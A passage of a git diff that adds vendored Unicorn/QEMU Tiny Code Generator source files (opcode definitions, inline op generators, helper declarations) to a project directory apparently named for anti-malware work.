32)); +#else + tcg_gen_op1i(s, INDEX_op_debug_insn_start, pc); +#endif +} + +static inline void tcg_gen_exit_tb(TCGContext *s, uintptr_t val) +{ + tcg_gen_op1i(s, INDEX_op_exit_tb, val); +} + +static inline void tcg_gen_goto_tb(TCGContext *s, unsigned idx) +{ + /* We only support two chained exits. */ + tcg_debug_assert(idx <= 1); +#ifdef CONFIG_DEBUG_TCG + /* Verify that we havn't seen this numbered exit before. */ + tcg_debug_assert((s->goto_tb_issue_mask & (1 << idx)) == 0); + s->goto_tb_issue_mask |= 1 << idx; +#endif + tcg_gen_op1i(s, INDEX_op_goto_tb, idx); +} + + +void tcg_gen_qemu_ld_i32(struct uc_struct *uc, TCGv_i32, TCGv, TCGArg, TCGMemOp); +void tcg_gen_qemu_st_i32(struct uc_struct *uc, TCGv_i32, TCGv, TCGArg, TCGMemOp); +void tcg_gen_qemu_ld_i64(struct uc_struct *uc, TCGv_i64, TCGv, TCGArg, TCGMemOp); +void tcg_gen_qemu_st_i64(struct uc_struct *uc, TCGv_i64, TCGv, TCGArg, TCGMemOp); + +static inline void tcg_gen_qemu_ld8u(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_UB); +} + +static inline void tcg_gen_qemu_ld8s(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_SB); +} + +static inline void tcg_gen_qemu_ld16u(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TEUW); +} + +static inline void tcg_gen_qemu_ld16s(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TESW); +} + +static inline void tcg_gen_qemu_ld32u(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TEUL); +} + +static inline void tcg_gen_qemu_ld32s(struct uc_struct *uc, TCGv ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_tl(uc, ret, addr, mem_index, MO_TESL); +} + +static inline void tcg_gen_qemu_ld64(struct uc_struct *uc, TCGv_i64 ret, TCGv addr, int mem_index) +{ + tcg_gen_qemu_ld_i64(uc, ret, addr, mem_index, MO_TEQ); +} + +static inline void tcg_gen_qemu_st8(struct uc_struct *uc, TCGv arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_tl(uc, arg, addr, mem_index, MO_UB); +} + +static inline void tcg_gen_qemu_st16(struct uc_struct *uc, TCGv arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_tl(uc, arg, addr, mem_index, MO_TEUW); +} + +static inline void tcg_gen_qemu_st32(struct uc_struct *uc, TCGv arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_tl(uc, arg, addr, mem_index, MO_TEUL); +} + +static inline void tcg_gen_qemu_st64(struct uc_struct *uc, TCGv_i64 arg, TCGv addr, int mem_index) +{ + tcg_gen_qemu_st_i64(uc, arg, addr, mem_index, MO_TEQ); +} + +#if TARGET_LONG_BITS == 64 +#define tcg_gen_movi_tl tcg_gen_movi_i64 +#define tcg_gen_mov_tl tcg_gen_mov_i64 +#define tcg_gen_ld8u_tl tcg_gen_ld8u_i64 +#define tcg_gen_ld8s_tl tcg_gen_ld8s_i64 +#define tcg_gen_ld16u_tl tcg_gen_ld16u_i64 +#define tcg_gen_ld16s_tl tcg_gen_ld16s_i64 +#define tcg_gen_ld32u_tl tcg_gen_ld32u_i64 +#define tcg_gen_ld32s_tl tcg_gen_ld32s_i64 +#define tcg_gen_ld_tl tcg_gen_ld_i64 +#define tcg_gen_st8_tl tcg_gen_st8_i64 +#define tcg_gen_st16_tl tcg_gen_st16_i64 +#define tcg_gen_st32_tl tcg_gen_st32_i64 +#define tcg_gen_st_tl tcg_gen_st_i64 +#define tcg_gen_add_tl tcg_gen_add_i64 +#define tcg_gen_addi_tl tcg_gen_addi_i64 +#define tcg_gen_sub_tl tcg_gen_sub_i64 +#define tcg_gen_neg_tl tcg_gen_neg_i64 +#define tcg_gen_subfi_tl tcg_gen_subfi_i64 +#define tcg_gen_subi_tl tcg_gen_subi_i64 +#define tcg_gen_and_tl tcg_gen_and_i64 +#define tcg_gen_andi_tl tcg_gen_andi_i64 +#define tcg_gen_or_tl tcg_gen_or_i64 +#define tcg_gen_ori_tl tcg_gen_ori_i64 +#define tcg_gen_xor_tl tcg_gen_xor_i64 +#define tcg_gen_xori_tl tcg_gen_xori_i64 +#define tcg_gen_not_tl tcg_gen_not_i64 +#define tcg_gen_shl_tl tcg_gen_shl_i64 +#define tcg_gen_shli_tl tcg_gen_shli_i64 +#define tcg_gen_shr_tl tcg_gen_shr_i64 +#define tcg_gen_shri_tl tcg_gen_shri_i64 +#define tcg_gen_sar_tl tcg_gen_sar_i64 +#define tcg_gen_sari_tl tcg_gen_sari_i64 +#define tcg_gen_brcond_tl tcg_gen_brcond_i64 +#define tcg_gen_brcondi_tl tcg_gen_brcondi_i64 +#define tcg_gen_setcond_tl tcg_gen_setcond_i64 +#define tcg_gen_setcondi_tl tcg_gen_setcondi_i64 +#define tcg_gen_mul_tl tcg_gen_mul_i64 +#define tcg_gen_muli_tl tcg_gen_muli_i64 +#define tcg_gen_div_tl tcg_gen_div_i64 +#define tcg_gen_rem_tl tcg_gen_rem_i64 +#define tcg_gen_divu_tl tcg_gen_divu_i64 +#define tcg_gen_remu_tl tcg_gen_remu_i64 +#define tcg_gen_discard_tl tcg_gen_discard_i64 +#define tcg_gen_trunc_tl_i32 tcg_gen_trunc_i64_i32 +#define tcg_gen_trunc_i64_tl tcg_gen_mov_i64 +#define tcg_gen_extu_i32_tl tcg_gen_extu_i32_i64 +#define tcg_gen_ext_i32_tl tcg_gen_ext_i32_i64 +#define tcg_gen_extu_tl_i64 tcg_gen_mov_i64 +#define tcg_gen_ext_tl_i64 tcg_gen_mov_i64 +#define tcg_gen_ext8u_tl tcg_gen_ext8u_i64 +#define tcg_gen_ext8s_tl tcg_gen_ext8s_i64 +#define tcg_gen_ext16u_tl tcg_gen_ext16u_i64 +#define tcg_gen_ext16s_tl tcg_gen_ext16s_i64 +#define tcg_gen_ext32u_tl tcg_gen_ext32u_i64 +#define tcg_gen_ext32s_tl tcg_gen_ext32s_i64 +#define tcg_gen_bswap16_tl tcg_gen_bswap16_i64 +#define tcg_gen_bswap32_tl tcg_gen_bswap32_i64 +#define tcg_gen_bswap64_tl tcg_gen_bswap64_i64 +#define tcg_gen_concat_tl_i64 tcg_gen_concat32_i64 +#define tcg_gen_extr_i64_tl tcg_gen_extr32_i64 +#define tcg_gen_andc_tl tcg_gen_andc_i64 +#define tcg_gen_eqv_tl tcg_gen_eqv_i64 +#define tcg_gen_nand_tl tcg_gen_nand_i64 +#define tcg_gen_nor_tl tcg_gen_nor_i64 +#define tcg_gen_orc_tl tcg_gen_orc_i64 +#define tcg_gen_rotl_tl tcg_gen_rotl_i64 +#define tcg_gen_rotli_tl tcg_gen_rotli_i64 +#define tcg_gen_rotr_tl tcg_gen_rotr_i64 +#define tcg_gen_rotri_tl tcg_gen_rotri_i64 +#define tcg_gen_deposit_tl tcg_gen_deposit_i64 +#define tcg_const_tl tcg_const_i64 +#define tcg_const_local_tl tcg_const_local_i64 +#define tcg_gen_movcond_tl tcg_gen_movcond_i64 +#define tcg_gen_add2_tl tcg_gen_add2_i64 +#define tcg_gen_sub2_tl tcg_gen_sub2_i64 +#define tcg_gen_mulu2_tl tcg_gen_mulu2_i64 +#define tcg_gen_muls2_tl tcg_gen_muls2_i64 +#else +#define tcg_gen_movi_tl tcg_gen_movi_i32 +#define tcg_gen_mov_tl tcg_gen_mov_i32 +#define tcg_gen_ld8u_tl tcg_gen_ld8u_i32 +#define tcg_gen_ld8s_tl tcg_gen_ld8s_i32 +#define tcg_gen_ld16u_tl tcg_gen_ld16u_i32 +#define tcg_gen_ld16s_tl tcg_gen_ld16s_i32 +#define tcg_gen_ld32u_tl tcg_gen_ld_i32 +#define tcg_gen_ld32s_tl tcg_gen_ld_i32 +#define tcg_gen_ld_tl tcg_gen_ld_i32 +#define tcg_gen_st8_tl tcg_gen_st8_i32 +#define tcg_gen_st16_tl tcg_gen_st16_i32 +#define tcg_gen_st32_tl tcg_gen_st_i32 +#define tcg_gen_st_tl tcg_gen_st_i32 +#define tcg_gen_add_tl tcg_gen_add_i32 +#define tcg_gen_addi_tl tcg_gen_addi_i32 +#define tcg_gen_sub_tl tcg_gen_sub_i32 +#define tcg_gen_neg_tl tcg_gen_neg_i32 +#define tcg_gen_subfi_tl tcg_gen_subfi_i32 +#define tcg_gen_subi_tl tcg_gen_subi_i32 +#define tcg_gen_and_tl tcg_gen_and_i32 +#define tcg_gen_andi_tl tcg_gen_andi_i32 +#define tcg_gen_or_tl tcg_gen_or_i32 +#define tcg_gen_ori_tl tcg_gen_ori_i32 +#define tcg_gen_xor_tl tcg_gen_xor_i32 +#define tcg_gen_xori_tl tcg_gen_xori_i32 +#define tcg_gen_not_tl tcg_gen_not_i32 +#define tcg_gen_shl_tl tcg_gen_shl_i32 +#define tcg_gen_shli_tl tcg_gen_shli_i32 +#define tcg_gen_shr_tl tcg_gen_shr_i32 +#define tcg_gen_shri_tl tcg_gen_shri_i32 +#define tcg_gen_sar_tl tcg_gen_sar_i32 +#define tcg_gen_sari_tl tcg_gen_sari_i32 +#define tcg_gen_brcond_tl tcg_gen_brcond_i32 +#define tcg_gen_brcondi_tl tcg_gen_brcondi_i32 +#define tcg_gen_setcond_tl tcg_gen_setcond_i32 +#define tcg_gen_setcondi_tl tcg_gen_setcondi_i32 +#define tcg_gen_mul_tl tcg_gen_mul_i32 +#define tcg_gen_muli_tl tcg_gen_muli_i32 +#define tcg_gen_div_tl tcg_gen_div_i32 +#define tcg_gen_rem_tl tcg_gen_rem_i32 +#define tcg_gen_divu_tl tcg_gen_divu_i32 +#define tcg_gen_remu_tl tcg_gen_remu_i32 +#define tcg_gen_discard_tl tcg_gen_discard_i32 +#define tcg_gen_trunc_tl_i32 tcg_gen_mov_i32 +#define tcg_gen_trunc_i64_tl tcg_gen_trunc_i64_i32 +#define tcg_gen_extu_i32_tl tcg_gen_mov_i32 +#define tcg_gen_ext_i32_tl tcg_gen_mov_i32 +#define tcg_gen_extu_tl_i64 tcg_gen_extu_i32_i64 +#define tcg_gen_ext_tl_i64 tcg_gen_ext_i32_i64 +#define tcg_gen_ext8u_tl tcg_gen_ext8u_i32 +#define tcg_gen_ext8s_tl tcg_gen_ext8s_i32 +#define tcg_gen_ext16u_tl tcg_gen_ext16u_i32 +#define tcg_gen_ext16s_tl tcg_gen_ext16s_i32 +#define tcg_gen_ext32u_tl tcg_gen_mov_i32 +#define tcg_gen_ext32s_tl tcg_gen_mov_i32 +#define tcg_gen_bswap16_tl tcg_gen_bswap16_i32 +#define tcg_gen_bswap32_tl tcg_gen_bswap32_i32 +#define tcg_gen_concat_tl_i64 tcg_gen_concat_i32_i64 +#define tcg_gen_extr_i64_tl tcg_gen_extr_i64_i32 +#define tcg_gen_andc_tl tcg_gen_andc_i32 +#define tcg_gen_eqv_tl tcg_gen_eqv_i32 +#define tcg_gen_nand_tl tcg_gen_nand_i32 +#define tcg_gen_nor_tl tcg_gen_nor_i32 +#define tcg_gen_orc_tl tcg_gen_orc_i32 +#define tcg_gen_rotl_tl tcg_gen_rotl_i32 +#define tcg_gen_rotli_tl tcg_gen_rotli_i32 +#define tcg_gen_rotr_tl tcg_gen_rotr_i32 +#define tcg_gen_rotri_tl tcg_gen_rotri_i32 +#define tcg_gen_deposit_tl tcg_gen_deposit_i32 +#define tcg_const_tl tcg_const_i32 +#define tcg_const_local_tl tcg_const_local_i32 +#define tcg_gen_movcond_tl tcg_gen_movcond_i32 +#define tcg_gen_add2_tl tcg_gen_add2_i32 +#define tcg_gen_sub2_tl tcg_gen_sub2_i32 +#define tcg_gen_mulu2_tl tcg_gen_mulu2_i32 +#define tcg_gen_muls2_tl tcg_gen_muls2_i32 +#endif + +#if UINTPTR_MAX == UINT32_MAX +# define tcg_gen_ld_ptr(S, R, A, O) \ + tcg_gen_ld_i32(S, TCGV_PTR_TO_NAT(R), (A), (O)) +# define tcg_gen_discard_ptr(A) \ + tcg_gen_discard_i32(TCGV_PTR_TO_NAT(A)) +# define tcg_gen_add_ptr(S, R, A, B) \ + tcg_gen_add_i32(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), TCGV_PTR_TO_NAT(B)) +# define tcg_gen_addi_ptr(S, R, A, B) \ + tcg_gen_addi_i32(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), (B)) +# define tcg_gen_ext_i32_ptr(S, R, A) \ + tcg_gen_mov_i32(S, TCGV_PTR_TO_NAT(R), (A)) +#else +# define tcg_gen_ld_ptr(S, R, A, O) \ + tcg_gen_ld_i64(S, TCGV_PTR_TO_NAT(R), (A), (O)) +# define tcg_gen_discard_ptr(A) \ + tcg_gen_discard_i64(TCGV_PTR_TO_NAT(A)) +# define tcg_gen_add_ptr(S, R, A, B) \ + tcg_gen_add_i64(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), TCGV_PTR_TO_NAT(B)) +# define tcg_gen_addi_ptr(S, R, A, B) \ + tcg_gen_addi_i64(S, TCGV_PTR_TO_NAT(R), TCGV_PTR_TO_NAT(A), (B)) +# define tcg_gen_ext_i32_ptr(S, R, A) \ + tcg_gen_ext_i32_i64(S, TCGV_PTR_TO_NAT(R), (A)) +#endif /* UINTPTR_MAX == UINT32_MAX */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-opc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-opc.h new file mode 100644 index 0000000..9df65bc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-opc.h @@ -0,0 +1,209 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* + * DEF(name, oargs, iargs, cargs, flags) + */ + +/* predefined ops */ +DEF(end, 0, 0, 0, TCG_OPF_NOT_PRESENT) /* must be kept first */ +DEF(nop, 0, 0, 0, TCG_OPF_NOT_PRESENT) +DEF(nop1, 0, 0, 1, TCG_OPF_NOT_PRESENT) +DEF(nop2, 0, 0, 2, TCG_OPF_NOT_PRESENT) +DEF(nop3, 0, 0, 3, TCG_OPF_NOT_PRESENT) + +/* variable number of parameters */ +DEF(nopn, 0, 0, 1, TCG_OPF_NOT_PRESENT) + +DEF(discard, 1, 0, 0, TCG_OPF_NOT_PRESENT) +DEF(set_label, 0, 0, 1, TCG_OPF_BB_END | TCG_OPF_NOT_PRESENT) + +/* variable number of parameters */ +DEF(call, 0, 0, 3, TCG_OPF_CALL_CLOBBER | TCG_OPF_NOT_PRESENT) + +DEF(br, 0, 0, 1, TCG_OPF_BB_END) + +#ifdef _MSC_VER +#define IMPL(X) ((0 && !(X)) ? TCG_OPF_NOT_PRESENT : 0) +#else +#define IMPL(X) (__builtin_constant_p(X) && !(X) ? TCG_OPF_NOT_PRESENT : 0) +#endif + +#if TCG_TARGET_REG_BITS == 32 +# define IMPL64 TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT +#else +# define IMPL64 TCG_OPF_64BIT +#endif + +DEF(mov_i32, 1, 1, 0, TCG_OPF_NOT_PRESENT) +DEF(movi_i32, 1, 0, 1, TCG_OPF_NOT_PRESENT) +DEF(setcond_i32, 1, 2, 1, 0) +DEF(movcond_i32, 1, 4, 1, IMPL(TCG_TARGET_HAS_movcond_i32)) +/* load/store */ +DEF(ld8u_i32, 1, 1, 1, 0) +DEF(ld8s_i32, 1, 1, 1, 0) +DEF(ld16u_i32, 1, 1, 1, 0) +DEF(ld16s_i32, 1, 1, 1, 0) +DEF(ld_i32, 1, 1, 1, 0) +DEF(st8_i32, 0, 2, 1, 0) +DEF(st16_i32, 0, 2, 1, 0) +DEF(st_i32, 0, 2, 1, 0) +/* arith */ +DEF(add_i32, 1, 2, 0, 0) +DEF(sub_i32, 1, 2, 0, 0) +DEF(mul_i32, 1, 2, 0, 0) +DEF(div_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) +DEF(divu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) +DEF(rem_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) +DEF(remu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) +DEF(div2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) +DEF(divu2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) +DEF(and_i32, 1, 2, 0, 0) +DEF(or_i32, 1, 2, 0, 0) +DEF(xor_i32, 1, 2, 0, 0) +/* shifts/rotates */ +DEF(shl_i32, 1, 2, 0, 0) +DEF(shr_i32, 1, 2, 0, 0) +DEF(sar_i32, 1, 2, 0, 0) +DEF(rotl_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) +DEF(rotr_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) +DEF(deposit_i32, 1, 2, 2, IMPL(TCG_TARGET_HAS_deposit_i32)) + +DEF(brcond_i32, 0, 2, 2, TCG_OPF_BB_END) + +DEF(add2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_add2_i32)) +DEF(sub2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_sub2_i32)) +DEF(mulu2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_mulu2_i32)) +DEF(muls2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_muls2_i32)) +DEF(muluh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_muluh_i32)) +DEF(mulsh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_mulsh_i32)) +DEF(brcond2_i32, 0, 4, 2, TCG_OPF_BB_END | IMPL(TCG_TARGET_REG_BITS == 32)) +DEF(setcond2_i32, 1, 4, 1, IMPL(TCG_TARGET_REG_BITS == 32)) + +DEF(ext8s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext8s_i32)) +DEF(ext16s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16s_i32)) +DEF(ext8u_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext8u_i32)) +DEF(ext16u_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16u_i32)) +DEF(bswap16_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap16_i32)) +DEF(bswap32_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap32_i32)) +DEF(not_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_not_i32)) +DEF(neg_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_neg_i32)) +DEF(andc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_andc_i32)) +DEF(orc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_orc_i32)) +DEF(eqv_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_eqv_i32)) +DEF(nand_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nand_i32)) +DEF(nor_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nor_i32)) + +DEF(mov_i64, 1, 1, 0, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) +DEF(movi_i64, 1, 0, 1, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) +DEF(setcond_i64, 1, 2, 1, IMPL64) +DEF(movcond_i64, 1, 4, 1, IMPL64 | IMPL(TCG_TARGET_HAS_movcond_i64)) +/* load/store */ +DEF(ld8u_i64, 1, 1, 1, IMPL64) +DEF(ld8s_i64, 1, 1, 1, IMPL64) +DEF(ld16u_i64, 1, 1, 1, IMPL64) +DEF(ld16s_i64, 1, 1, 1, IMPL64) +DEF(ld32u_i64, 1, 1, 1, IMPL64) +DEF(ld32s_i64, 1, 1, 1, IMPL64) +DEF(ld_i64, 1, 1, 1, IMPL64) +DEF(st8_i64, 0, 2, 1, IMPL64) +DEF(st16_i64, 0, 2, 1, IMPL64) +DEF(st32_i64, 0, 2, 1, IMPL64) +DEF(st_i64, 0, 2, 1, IMPL64) +/* arith */ +DEF(add_i64, 1, 2, 0, IMPL64) +DEF(sub_i64, 1, 2, 0, IMPL64) +DEF(mul_i64, 1, 2, 0, IMPL64) +DEF(div_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) +DEF(divu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) +DEF(rem_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) +DEF(remu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) +DEF(div2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) +DEF(divu2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) +DEF(and_i64, 1, 2, 0, IMPL64) +DEF(or_i64, 1, 2, 0, IMPL64) +DEF(xor_i64, 1, 2, 0, IMPL64) +/* shifts/rotates */ +DEF(shl_i64, 1, 2, 0, IMPL64) +DEF(shr_i64, 1, 2, 0, IMPL64) +DEF(sar_i64, 1, 2, 0, IMPL64) +DEF(rotl_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rot_i64)) +DEF(rotr_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rot_i64)) +DEF(deposit_i64, 1, 2, 2, IMPL64 | IMPL(TCG_TARGET_HAS_deposit_i64)) + +DEF(trunc_shr_i32, 1, 1, 1, + IMPL(TCG_TARGET_HAS_trunc_shr_i32) + | (TCG_TARGET_REG_BITS == 32 ? TCG_OPF_NOT_PRESENT : 0)) + +DEF(brcond_i64, 0, 2, 2, TCG_OPF_BB_END | IMPL64) +DEF(ext8s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8s_i64)) +DEF(ext16s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16s_i64)) +DEF(ext32s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32s_i64)) +DEF(ext8u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8u_i64)) +DEF(ext16u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16u_i64)) +DEF(ext32u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32u_i64)) +DEF(bswap16_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap16_i64)) +DEF(bswap32_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap32_i64)) +DEF(bswap64_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap64_i64)) +DEF(not_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_not_i64)) +DEF(neg_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_neg_i64)) +DEF(andc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_andc_i64)) +DEF(orc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_orc_i64)) +DEF(eqv_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_eqv_i64)) +DEF(nand_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nand_i64)) +DEF(nor_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nor_i64)) + +DEF(add2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_add2_i64)) +DEF(sub2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_sub2_i64)) +DEF(mulu2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_mulu2_i64)) +DEF(muls2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_muls2_i64)) +DEF(muluh_i64, 1, 2, 0, IMPL(TCG_TARGET_HAS_muluh_i64)) +DEF(mulsh_i64, 1, 2, 0, IMPL(TCG_TARGET_HAS_mulsh_i64)) + +/* QEMU specific */ +#if TARGET_LONG_BITS > TCG_TARGET_REG_BITS +DEF(debug_insn_start, 0, 0, 2, TCG_OPF_NOT_PRESENT) +#else +DEF(debug_insn_start, 0, 0, 1, TCG_OPF_NOT_PRESENT) +#endif +DEF(exit_tb, 0, 0, 1, TCG_OPF_BB_END) +DEF(goto_tb, 0, 0, 1, TCG_OPF_BB_END) + +#define TLADDR_ARGS (TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? 1 : 2) +#define DATA64_ARGS (TCG_TARGET_REG_BITS == 64 ? 1 : 2) + +DEF(qemu_ld_i32, 1, TLADDR_ARGS, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) +DEF(qemu_st_i32, 0, TLADDR_ARGS + 1, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) +DEF(qemu_ld_i64, DATA64_ARGS, TLADDR_ARGS, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) +DEF(qemu_st_i64, 0, TLADDR_ARGS + DATA64_ARGS, 2, + TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) + +#undef TLADDR_ARGS +#undef DATA64_ARGS +#undef IMPL +#undef IMPL64 +#undef DEF diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-runtime.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-runtime.h new file mode 100644 index 0000000..23a0c37 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-runtime.h @@ -0,0 +1,16 @@ +DEF_HELPER_FLAGS_2(div_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) +DEF_HELPER_FLAGS_2(rem_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) +DEF_HELPER_FLAGS_2(divu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) +DEF_HELPER_FLAGS_2(remu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) + +DEF_HELPER_FLAGS_2(div_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_2(rem_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_2(divu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(remu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(shl_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(shr_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(sar_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) + +DEF_HELPER_FLAGS_2(mulsh_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_2(muluh_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.c new file mode 100644 index 0000000..679836a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.c @@ -0,0 +1,2764 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR 